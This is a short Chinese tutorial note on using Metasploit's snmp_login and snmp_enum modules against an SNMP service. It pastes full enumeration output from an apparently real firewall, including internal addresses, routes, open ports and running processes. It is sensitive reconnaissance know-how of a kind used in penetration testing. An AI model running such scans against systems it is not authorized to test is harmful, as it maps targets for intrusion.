snmp协议漏洞的msf利用
利用msf的snmp扫描模块
use auxiliary/scanner/snmp/snmp_login
options 看下选项,填ip即可,端口默认161
set rhosts ip
run
use auxiliary/scanner/snmp/snmp_enum
options
set rhosts ip
run
不一一截图了,东西很多,在这里
[+] 1.1.1.1, Connected. [*] System information: Host IP : 1.1.1.42 Hostname : LanSecS-NGFW Description : Build 20180808, Build time is Aug 8 2018 19:13:59 Contact : 1617493748.9880378 Location : - Uptime snmp : 7 days, 22:22:46.67 Uptime system : 7 days, 22:22:47.00 System date : 2021-6-24 09:55:26.0 [*] Network information: IP forwarding enabled : yes Default TTL : 64 TCP segments received : 0 TCP segments sent : 0 TCP segments retrans : 0 Input datagrams : 0 Delivered datagrams : 0 Output datagrams : 0 [*] Network interfaces: Interface : [ up ] lo Id : 1 Mac Address : ::::: Type : softwareLoopback Speed : 10 Mbps MTU : 65536 In octets : 334572 Out octets : 334572 Interface : [ down ] mgt0 Id : 2 Mac Address : 11:11:11:11:11:52 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ up ] ge0 Id : 3 Mac Address : 11:11:11:11:11:53 Type : ethernet-csmacd Speed : 100 Mbps MTU : 1500 In octets : 3650758938 Out octets : 2879780760 Interface : [ up ] ge1 Id : 4 Mac Address : 11:11:11:11:11:54 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 3012784434 Out octets : 3202924143 Interface : [ down ] ge2 Id : 5 Mac Address : 11:11:11:11:11:55 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge3 Id : 6 Mac Address : 11:11:11:11:11:56 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge4 Id : 7 Mac Address : 11:11:11:11:11:57 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge5 Id : 8 Mac Address : 11:11:11:11:11:58 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge6 Id : 9 Mac Address : 11:11:11:11:11:59 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge7 Id : 10 Mac Address : 11:11:11:11:11:5a Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge8 Id : 11 Mac Address : 11:11:11:11:11:5b Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge9 Id : 12 Mac Address : 11:11:11:11:11:5c Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge10 Id : 13 Mac Address : 11:11:11:11:11:5d Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge11 Id : 14 Mac Address : 11:11:11:11:11:5e Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge12 Id : 15 Mac Address : 11:11:11:11:11:5f Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge13 Id : 16 Mac Address : 11:11:11:11:11:60 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge14 Id : 17 Mac Address : 11:11:11:11:11:61 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge15 Id : 18 Mac Address : 11:11:11:11:11:62 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge16 Id : 19 Mac Address : 11:11:11:11:11:63 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge17 Id : 20 Mac Address : 11:11:11:11:11:64 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge18 Id : 21 Mac Address : 11:11:11:11:11:65 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge19 Id : 22 Mac Address : 11:11:11:11:11:66 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge20 Id : 23 Mac Address : 11:11:11:11:11:67 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge21 Id : 24 Mac Address : 11:11:11:11:11:68 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge22 Id : 25 Mac Address : 11:11:11:11:11:69 Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ down ] ge23 Id : 26 Mac Address : 11:11:11:11:11:6a Type : ethernet-csmacd Speed : 1000 Mbps MTU : 1500 In octets : 0 Out octets : 0 Interface : [ up ] tunnel4095 Id : 27 Mac Address : ce:d7:a8:24:65:49 Type : ethernet-csmacd Speed : 0 Mbps MTU : 1500 In octets : 0 Out octets : 93122 Interface : [ up ] tunnel0 Id : 28 Mac Address : 1a:e1:38:60:b9:a9 Type : ethernet-csmacd Speed : 0 Mbps MTU : 1420 In octets : 0 Out octets : 0 [*] Network IP: Id IP Address Netmask Broadcast 5 1.1.1.1 255.255.255.252 1 4 10.10.10.2 255.255.255.252 1 1 127.0.0.1 255.0.0.0 0 27 172.16.1.1 255.255.255.0 1 2 192.168.1.1 255.255.255.0 1 3 1.1.1.1 255.255.255.248 1 [*] Routing information: Destination Next hop Mask Metric 0.0.0.0 1.1.1.41 0.0.0.0 1 10.10.10.0 0.0.0.0 255.255.255.252 0 10.11.0.0 10.10.10.1 255.255.0.0 1 172.16.1.0 0.0.0.0 255.255.255.0 0 192.168.8.0 10.10.10.1 255.255.252.0 1 1.1.1.40 0.0.0.0 255.255.255.248 0 [*] TCP connections and listening ports: Local address Local port Remote address Remote port State 0.0.0.0 22 0.0.0.0 0 listen 0.0.0.0 80 0.0.0.0 0 listen 0.0.0.0 443 0.0.0.0 0 listen 0.0.0.0 4433 0.0.0.0 0 listen 0.0.0.0 8000 0.0.0.0 0 listen 0.0.0.0 8001 0.0.0.0 0 listen 0.0.0.0 8888 0.0.0.0 0 listen 0.0.0.0 10443 0.0.0.0 0 listen [*] Listening UDP ports: Local address Local port 0.0.0.0 161 0.0.0.0 500 0.0.0.0 1812 0.0.0.0 1813 0.0.0.0 2000 0.0.0.0 4500 0.0.0.0 36168 0.0.0.0 61441 0.0.0.0 61442 [*] Storage information: Description : ["Physical memory"] Device id : [#<SNMP::Integer:0x00007fdf1fe327d0 @value=1>] Filesystem type : ["Ram"] Device unit : [#<SNMP::Integer:0x00007fdf1fe3b678 @value=1024>] Memory size : 786.86 MB Memory used : 373.98 MB Description : ["Virtual memory"] Device id : [#<SNMP::Integer:0x00007fdf1fe44750 @value=3>] Filesystem type : ["Virtual Memory"] Device unit : [#<SNMP::Integer:0x00007fdf1fe4e750 @value=1024>] Memory size : 786.86 MB Memory used : 373.98 MB Description : ["Memory buffers"] Device id : [#<SNMP::Integer:0x00007fdf1fe63768 @value=6>] Filesystem type : ["Other"] Device unit : [#<SNMP::Integer:0x00007fdf1fe61648 @value=1024>] Memory size : 786.86 MB Memory used : 75.87 MB Description : ["Cached memory"] Device id : [#<SNMP::Integer:0x00007fdf1fe77358 @value=7>] Filesystem type : ["Other"] Device unit : [#<SNMP::Integer:0x00007fdf1fe75238 @value=1024>] Memory size : 148.35 MB Memory used : 148.35 MB Description : ["Shared memory"] Device id : [#<SNMP::Integer:0x00007fdf1fe8b628 @value=8>] Filesystem type : ["Other"] Device unit : [#<SNMP::Integer:0x00007fdf1fe88680 @value=1024>] Memory size : 16.77 MB Memory used : 16.77 MB Description : ["Swap space"] Device id : [#<SNMP::Integer:0x00007fdf1fe9a3f8 @value=10>] Filesystem type : ["Virtual Memory"] Device unit : [#<SNMP::Integer:0x00007fdf1fea7dc8 @value=1024>] Memory size : 0 bytes Memory used : 0 bytes Description : ["/mnt"] Device id : [#<SNMP::Integer:0x00007fdf1febbc38 @value=31>] Filesystem type : ["Fixed Disk"] Device unit : [#<SNMP::Integer:0x00007fdf1fec3e60 @value=4096>] Memory size : 3.46 GB Memory used : 201.90 MB Description : ["/var/system_rw"] Device id : [#<SNMP::Integer:0x00007fdf1fec8d70 @value=33>] Filesystem type : ["Fixed Disk"] Device unit : [#<SNMP::Integer:0x00007fdf1fed64c0 @value=4096>] Memory size : 472.12 MB Memory used : 7.77 MB Description : ["/dev/shm"] Device id : [#<SNMP::Integer:0x00007fdf1fee71d0 @value=36>] Filesystem type : ["Fixed Disk"] Device unit : [#<SNMP::Integer:0x00007fdf1fee40e8 @value=4096>] Memory size : 472.12 MB Memory used : 9.00 MB Description : ["/image"] Device id : [#<SNMP::Integer:0x00007fdf1fefa2f8 @value=40>] Filesystem type : ["Fixed Disk"] Device unit : [#<SNMP::Integer:0x00007fdf1ff07a20 @value=512>] Memory size : 97.26 MB Memory used : 2.94 MB [*] File system information: Index : 1 Mount point : /mnt Remote mount point : - Type : LinuxExt2 Access : 1 Bootable : 2 [*] Device information: Id Type Status Descr 196608 Processor running 196609 Processor running 196610 Processor running 196611 Processor running 262145 Network running network interface lo 262146 Network down network interface mgt0 262147 Network running network interface ge0 262148 Network running network interface ge1 262149 Network down network interface ge2 262150 Network down network interface ge3 262151 Network down network interface ge4 262152 Network down network interface ge5 262153 Network down network interface ge6 262154 Network down network interface ge7 262155 Network down network interface ge8 262156 Network down network interface ge9 262157 Network down network interface ge10 262158 Network down network interface ge11 262159 Network down network interface ge12 262160 Network down network interface ge13 262161 Network down network interface ge14 262162 Network down network interface ge15 262163 Network down network interface ge16 262164 Network down network interface ge17 262165 Network down network interface ge18 262166 Network down network interface ge19 262167 Network down network interface ge20 262168 Network down network interface ge21 262169 Network down network interface ge22 262170 Network down network interface ge23 262171 Network running network interface tunnel4095 262172 Network running network interface tunnel0 786432 Coprocessor unknown Guessing that there's a floating point co-processor [*] Processes: Id Status Name Path Parameters 1 runnable init init 1246 runnable sysmon /usr/local/sbin/sysmon 1346 runnable syslog /usr/local/sbin/syslog 1349 runnable ifmd /usr/local/sbin/ifmd 1443 running dplane0 /usr/local/sbin/dplane 1445 running dplane1 /usr/local/sbin/dplane 1446 running dplane2 /usr/local/sbin/dplane 1447 running dplane3 /usr/local/sbin/dplane 1454 runnable aaa /usr/local/sbin/aaa 1468 runnable zebra /usr/local/sbin/zebra-d 1470 runnable iked /usr/local/sbin/iked 1829 runnable dplane_urcu /usr/local/sbin/dplane 1836 runnable ripd /usr/local/sbin/ripd-d 1844 runnable ospfd /usr/local/sbin/ospfd-d 1847 runnable ospf6d /usr/local/sbin/ospf6d-d 1848 runnable smtpc /usr/local/sbin/smtpc 1849 runnable samc /usr/local/sbin/samc 1851 runnable dhcp /usr/local/sbin/dhcp 1852 runnable pppoe /usr/local/sbin/pppoe 1853 runnable ntp /usr/local/sbin/ntp 1854 runnable updated /usr/local/sbin/updated 1855 running snmpd /usr/local/sbin/snmpd-f 1856 runnable pki /usr/local/sbin/pki 1862 runnable smpd /usr/local/sbin/smpd-d 1870 runnable xmld /usr/local/sbin/xmld 1880 runnable filesync /usr/local/sbin/filesync 1882 runnable lighttpd /usr/local/webserver/sbin/lighttpd-f /usr/local/webserver/webserver.conf 1884 runnable php-cgi /usr/local/webserver/sbin/php-cgi 1886 runnable php-cgi /usr/local/webserver/sbin/php-cgi 1889 runnable php-cgi /usr/local/webserver/sbin/php-cgi 1890 runnable php-cgi /usr/local/webserver/sbin/php-cgi 1940 runnable dplane_url_quer /usr/local/sbin/dplane 1951 runnable dplane_control /usr/local/sbin/dplane 1959 runnable dplane_ssl /usr/local/sbin/dplane 2027 runnable lighttpd_auth /usr/local/webserver/sbin/lighttpd_auth-f /usr/local/webserver/webauth.conf 2029 runnable portal.fastcgi /usr/local/sbin/portal.fastcgi 2044 runnable sshd /usr/local/sbin/sshd 2052 runnable telnetd telnetd -l /usr/local/sbin/vtysh 2060 runnable vtysh /usr/local/sbin/vtysh [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
MU5735 R.I.P
